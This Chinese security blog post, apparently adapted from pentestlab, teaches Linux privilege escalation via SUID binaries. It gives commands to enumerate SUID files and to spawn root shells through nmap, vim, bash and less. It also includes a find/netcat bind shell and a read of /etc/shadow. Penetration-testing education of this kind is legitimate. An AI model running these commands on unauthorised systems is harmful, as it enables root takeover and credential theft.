感谢余弦(公众号搜索懒人在思考)对本公众号的宣传推广,使我们的关注量涨了很多,也有用户会在后台留言跟我们讨论一些很有意思的技术问题,感谢感谢@余弦。
昨天是程序猿节,本来打算昨天更新公众号的,无奈昨天事情较多,所以选择今天更新,祝广大程序猿们少加班,快脱单。
今天给大家带来的是linux下的提权技巧。SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。
已知的可用来提权的linux可行性的文件列表如下:
Nmap
Vim
find
Bash
More
Less
Nano
cp
以下命令可以发现系统上运行的所有SUID可执行文件。具体来说,命令将尝试查找具有root权限的SUID的文件。
1
2 3 | find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
|
发现SUID可执行文件
以上所有二进制文件都将以root用户权限执行,因为它们的权限中包含"s",并且对应的是root权限。
1 2 | ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap
|
SUID可执行文件 - Nmap
NMAP
较旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell。
Nmap版本识别
交互模式可以通过执行Nmap参数" interactive "
Nmap - 交互模式
以下命令将提供一个提升的shell。
1 2 3 | nmap> !sh
sh-3.2# whoami
root
|
提权至Root权限
也可以通过Metasploit模块对Nmap的二进制文件进行权限提升。
1 | exploit/unix/local/setuid_nmap
|
Find
如果Find命令也是以Suid权限运行的话,则将通过find执行的所有命令都会以root权限执行。
1 2 | touch pentestlab
find pentestlab -exec whoami \;
|
Find命令权限提升
大部分Linux操作系统都安装了netcat,因此也可以被利用来将权限提升至root。
1
| find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
|
通过Find运行Netcat
连接上去就会直接获取到一个Root权限的shell。
1 2 3 | netcat 192.168.1.189 5555
id
cat /etc/shadow
|
Root权限的shell
VIM
Vim是Linux环境下的一款文件编辑器。但是,如果以SUID运行的话,它会继承root用户的权限,因此可以读取系统上的所有文件。
Vim - Shadow文件读取
1 2 3 4 | vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
|
Vim - Root权限
Bash
以下命令将以root权限打开一个bash shell。
1 2 3 | bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
|
Bash - Root权限
Less
Less和More都执行以用来提权。
1 2 | less /etc/passwd
!/bin/sh
|
获取到Root权限
参考资料
https://pentestlab.blog/2017/09/25/suid-executables/
http://blog.csdn.net/haofeifei6/article/details/11516753
威胁情报分析平台
最近在做一些威胁情报分析,apt攻击源分析中,发现了一个很好的平台,给大家推荐一下。
http://www.secange.com/2017/10/%E5%A8%81%E8%83%81%E6%83%85%E6%8A%A5%E5%88%86%E6%9E%90%E5%B9%B3%E5%8F%B0/
平台地址:http://www.vxcube.com
如果喜欢我们就扫码关注我们的微信公众号杂术馆,定期更新信息安全,渗透测试技巧,期待你的加入。
